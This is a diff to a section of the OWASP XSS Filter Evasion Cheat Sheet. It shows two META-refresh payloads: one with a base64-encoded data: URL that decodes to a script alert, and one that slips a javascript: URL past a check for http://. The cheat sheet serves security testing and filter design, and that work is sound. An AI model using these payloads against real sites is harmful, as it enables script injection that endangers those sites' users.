OWASP/CheatSheetSeries/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md

 #### META using Data

 Directive URL scheme.
 This attack method is nice because it also doesn't have anything visible that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding.
-Please see RFC 2397 for more details or go here or here to encode your own.
-You can also use the XSS [calculator](http://ha.ckers.org/xsscalc.html) below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:
+Please see [RFC 2397](https://datatracker.ietf.org/doc/html/rfc2397) for more details.

 `<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">`

 #### META with Additional URL Parameter

-If the target website attempts to see if the URL contains `<http://>;` at the beginning you can evade this filter approach with the following technique (Submitted by Moritz Naumann):
+If the target website attempts to see if the URL contains `<http://>;` at the beginning you can evade this filter rule with the following technique (Submitted by Moritz Naumann):

 `<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">`